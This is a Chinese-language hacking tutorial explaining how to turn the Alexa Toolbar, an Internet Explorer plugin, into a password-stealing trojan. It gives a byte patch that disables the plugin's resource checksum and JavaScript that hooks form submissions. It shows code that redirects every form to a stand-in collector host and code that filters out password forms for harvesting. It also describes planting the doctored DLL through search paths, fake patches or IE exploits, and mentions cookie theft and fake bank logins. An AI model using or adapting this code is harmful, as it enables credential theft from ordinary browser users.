9年前,它还只是一个不起眼的小网站,从事的主要是一些分类导航。在那个网络还不是很发达的年代,Yahoo是很多网站追捧的明星,而它只不过是众多的Fans中的一员。但与其他Fans不同的地方是它还有一些真的属于自己的东西,就是对访问Web站点的流量进行统计和分析。随着力量的壮大,后来,它还向网民提供自己开发的搜索引擎服务。它就是Alexa,1996年创立于美国,网址是http://www.alexa.com ,现如今的Alexa主要从事的是发布全球网站排名信息。
它在1997年7月开发了一款软件,就是现在著名的Alexa Toolbar(Alexa工具条),这是一个嵌入到微软IE中的工具,用户在访问每个web页面时都会向它发回一串代码,将该次浏览的相关信息告诉Alexa,而用户会在该工具条上看到其浏览的网站在全球所有网站中的排名信息。Alexa通过在客户端安装Alexa工具条来收集采样全球网站的访问数据,以这些数据为依据对全球网站进行排名,类似于电视收视率的统计。Alexa工具条是一种类似于Google工具条的IE插件(图1),可以在下面URL中下载http://download.alexa.com/index.cgi.
目前,全球的Alexa工具条"装机量"已经超过上千万。光在我国不到1亿的网民中就已经有超过130万的用户安装了Alexa工具条。Alexa能基于遍及全球电脑用户桌面的工具条返回的信息,对全球网民的浏览进行监测。
但是,就这么一艘航空母舰,它的安全状况又如何呢?每当用户以安装有Alexa工具条的IE打开新页面时,Alexa的一台服务器(data.Alexa.com)都会收到加密数据包,这个数据包中的核心信息是十几个参数,包括当前网页地址,页面打开时间,用户端显示分辨率,Alexa工具条版本号等。其中有一个重要的隐含参数,是Alexa为每个已安装工具条自动生成的ID号码,该号码是全球惟一的。ID对Alexa来说,作用是通过它来对每个反馈数据包的发出者进行惟一标识,这样可以解决PV重复计算问题和防止同一用户多次刷新作弊的一个重要手段。但是,黑客可以通过破解植入IE浏览器的Alexa工具条,或者破解Alexa用来惟一标识用户身份的ID号码生成算法,就能模拟多个ID向Alexa服务器发送假信息。不过,这种方法对于广大黑迷朋友来说并没有多大的实际意义,它只不过是给那些不知名网站提高自己的排名提供了一个可乘之机。
黑客关心的是如何将Alexa Toolbar(Alexa工具条)变成木马。
Alexa工具条的运作原理
其实Alexa工具条是一种基于BHO和Toolbar Bands技术的IE插件。它以DLL文件的形式存在于系统中,是一种COM组件,IE会在运行时将其加载到自身进程中去。因此,一般情况下_blank">防火墙是无法禁止该软件访问网络的,这就为它的木马角色提供了先天的便利,而且比本机Sniff软件收集密码的优势是:无论是HTTP还是HTTPS的网站,不管通信通道是否加密,只要是IE页面的表单都能收集到。具体原理大家可以参考《关于Alexa排名作弊的一些解惑》。系统在安装了Alexa工具条后,会在系统目录下生成AlxTB1.dll和AlxRes.dll两个DLL文件(图2)(有些情况下并不是AlxTB1.dll,而是AlxTB2.dll,那是因为Alexa工具条会自动上网更新的原因)。Alexa工具条的主要二进制代码存在于AlxTB1.dll文件中,这个文件同时也被注册成多个COM组件,它完成了BHO和Toolbar Bands的COM接口,并将IE的WebBrowser控件封装为一个COM组件供AlxRes.dll调用。AlxRes.dll文件仅包含少量的二进制代码,大量的代码是HTML和JavaScript代码,它们以资源的形式存在于AlxRes.dll文件中,可以通过res://AlxRes.dll/CHTML/about.html这样的URL来访问这些资源.也许有人会感觉到奇怪:又不是做网站,为什么软件的代码会是JavaScript写的?其实这就是Alexa工具条垃圾的地方.Alexa工具条的主界面是由HTML+JavaScript实现的,这些JavaScript代码通过调用AlxTB1.dll实现的COM接口来实现软件的全部功能。这样做不仅导致软件的效率低下,而且产生大量的资源泄漏,绝对是一种VERY超级SB的开发模式,但是却为黑客修改Alexa工具条的功能提供了“方便”,只要一个PE资源修改工具黑客就可以对Alexa工具条的代码进行修改了。
破解Alexa工具条
当然,Alexa也并不是真傻,绝对不会蠢到让自己的代码被别人用资源修改工具随便修改。为了防止AlxRes.dll中的资源被随意修改,它采取了计算文件校验和的保护方法,要是发现文件被修改,就会拒绝加载。黑客在修改代码前,必须破解这种保护机制。 AlxTB1.dll导出一个名叫ChecksumResources的函数,这个函数就是用来计算文件校验和的。用c32asm反汇编AlxRes.dll文件,查看字符串调用列表,找到"ChecksumResources"字符串(图3),跳转到调用该字符串的代码,于100017C0处(图4)。往下翻几行,在100017F6处找到一句跳转(图5),采用爆破方式,用NOP指令覆盖JNZ指令即可。通俗点讲:就是将AlxRes.dll文件偏移"0x17F6"处的两个字节"75 11"改成"90 90"(图6),也可以使用WinHex之类的16进制编辑软件来修改。
::100017C0:: 68 9C700010 PUSH 1000709C \:BYJMP JmpBy:100017A4,100017B1, \->: ChecksumResources
::100017C5:: 57 PUSH EDI
::100017C6:: FF15 1C500010 CALL [1000501C] >>>: KERNEL32.DLL:GetProcAddress
::100017CC:: 85C0 TEST EAX, EAX
::100017CE:: 74 0E JE SHORT 100017DE \:JMPDOWN
::100017D0:: 8D4D DC LEA ECX, [EBP-24]
::100017D3:: 51 PUSH ECX
::100017D4:: FF35 44740010 PUSH DWORD PTR [10007444]
::100017DA:: FFD0 CALL EAX
::100017DC:: 59 POP ECX
::100017DD:: 59 POP ECX
::100017DE:: 57 PUSH EDI \:BYJMP JmpBy:100017CE,
::100017DF:: FF15 18500010 CALL [10005018] >>>: KERNEL32.DLL:FreeLibrary
::100017E5:: 8D45 B8 LEA EAX, [EBP-48]
::100017E8:: 50 PUSH EAX
::100017E9:: 8D45 DC LEA EAX, [EBP-24]
::100017EC:: 50 PUSH EAX
::100017ED:: E8 AE060000 CALL 10001EA0 \:JMPDOWN
::100017F2:: 59 POP ECX
::100017F3:: 85C0 TEST EAX, EAX
::100017F5:: 59 POP ECX
::100017F6:: 75 11 JNZ SHORT 10001809 \:JMPDOWN ;就是修改这里
现在黑客可以毫无顾忌地修改AlxRes.dll中的资源了。可以参考《新版本的 Alexa Toolbar 破解方法》。
修改Alexa工具条的代码
熟悉IE编程的人都知道,DWebBrowserEvents2接口是用来接收WebBrowser的事件通知的,黑客可以在AlxRes.dll的Javascript代码中找到这些对应的函数。在res://AlxRes.dll/SCRIPT/EVT.CLASS.JS的代码中,有一系列的JavaScript函数,对应于DWebBrowserEvents2接口的成员,如:DocumentComplete->BP_onDocumentComplete,NavigateComplete2->BP_onNavigateComplete,BeforeNavigate2->BP_onBeforeNavigate。按照DWebBrowserEvents2接口,黑客可以在BeforeNavigate2中截获PostData,但是在AlxRes.dll的代码中,这个接口没有完全实现。在DWebBrowserEvents2接口中的原型是:
void BeforeNavigate2(IDispatch *pDisp,
VARIANT *&url,
VARIANT *&Flags,
VARIANT *&TargetFrameName,
VARIANT *&PostData,
VARIANT *&Headers,
VARIANT_BOOL *&Cancel
);
这其中的PostData包含了的Post数据。而BP_onBeforeNavigate的函数原型:
function BP_onBeforeNavigate(oParentWebBrowser2, oWebBrowser2, sURL, bPostData, sHeaders);
其中,bPostData只是个BOOL类型的变量。
一般来说,人们在IE中输入的用户名密码都是通过表单提交到服务器的,如果能在表单提交前截获表单的内容就可以实现窃取密码了。在JavaScript中,只要处理表单的"OnSubmit"事件,就可以先于提交而处理表单的内容。而AlxRes.dll的功能也是由JavaScript实现的,所以黑客就无需面对繁琐的COM接口,而直接使用JavaScript了。
截获网页表单的内容
上面讲的东西有些类似于"跨站点脚本执行漏洞"。先来看看"res://AlxRes.dll/SCRIPT/EVT.CLASS.JS"中的"BP_onDocumentComplete"函数:
function BP_onDocumentComplete(oParentWebBrowser2, oWebBrowser2, sURL);
该函数在IE的当前浏览页面被加载完成时被调用,其中的 oWebBrowser2 参数可以当作当前IE正在浏览的页面的Windows对象。黑客可以添加如下代码:
function BP_onDocumentComplete(oParentWebBrowser2, oWebBrowser2, sURL) {
... ...
try{
for(i=0;i<oWebBrowser2.document.forms.length;i++)
{
oWebBrowser2.document.forms.onsubmit=test;
}
}catch(e){}
return false;
}
这段代码的作用就是枚举当前页面中所有的表单对象,并为这些表单定义OnSubmit事件。接下来就是完成test函数了:
function test()
{
try{
window.alert("I can get the value!");
for(i=0;i<this.length;i++)
{
if(this.elements.name!="")
{
window.alert(this.elements.name+":"+this.elements.value);
//do some thing
}
}
}catch(e){}
return true;
}
不过用这种方法存在一点弊端:当表单是通过JavaScript语句"Submit()"提交时,不会产生"OnSubmit"事件,上面的代码也就无法纪录下表单的内容了。黑客还可以采用更高级的方法----改变表单提交地址的方法来解决这个问题:
function BP_onDocumentComplete(oParentWebBrowser2, oWebBrowser2, sURL) {
... ...
try{
for(i=0;i<oWebBrowser2.document.forms.length;i++)
{
oWebBrowser2.document.forms.innerHTML=oWebBrowser2.document.forms.innerHTML+"<input name=OriginalAction type=hidden value='"+oWebBrowser2.document.forms.action+"'>";
oWebBrowser2.document.forms.action="http://www.faketarget.com/gather.asp";
}
}catch(e){}
return false;
}
散布和植入木马
以上代码均是用PE资源软件修改AlxRes.dll文件实现的。所以,只要用新的AlxRes.dll文件将原来系统的AlxRes.dll替换掉。Alexa工具条在加载的时候会优先在"C:\Program Files\Internet Explorer"和"C:\Documents and Settings[username]\桌面"这两个路径下搜索AlxRes.dll,所以也可以把修改过的AlxRes.dll放到这两个路径下,这样就不用覆盖源文件了。至于怎么安装,这里黑客可以利用一些IE漏洞去Exploit。
安装了Alexa工具条的IE的"User-Agent"会加入"Alexa Toolbar(图7)"的标记,所以很容易区分目标的IE是否已经安装了Alexa工具条:
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Alexa Toobar)
也可以修改Alexa的安装文件,或者以Alexa补丁的名义来发布。
收集密码
黑客可以用FileSystemObject控件来将表单内容纪录到文件,或者直接作为参数发送到某个Web服务器,由Web服务器收集记录下来。为了在客户端过滤一些不包含密码的表单,黑客可以在AlxRes.dll的代码中对收集的表单数据进行一些检查:
function test()
{
var IsPwdForm=false;
var FormStr;
try{
for(i=0;i<this.length;i++)
{
if(this.elements.name!="")
{
if(this.elements.type=="password")
IsPwdForm=true;
FormStr=FormStr+this.elements.name+"="+this.elements.value+"&";
}
}
if(IsPwdForm)
{
//表单包含密码文本,进行收集
}
}catch(e){}
return true;
}
其他的应用
大多数的网上银行登录界面是由ActiveX控件实现的,无法截获表单数据,但是可以通过"oWebBrowser2"对象来操纵、修改浏览的页面,也有可能伪造一个网上银行的登陆界面.还可以用来收集用户浏览网页的纪录,也可以用来窃取用户COOKIE等,所以造成的危害是不可想像的.
怎么样?是不是很害怕!没有想到连Alexa也会有这样的安全隐患吧!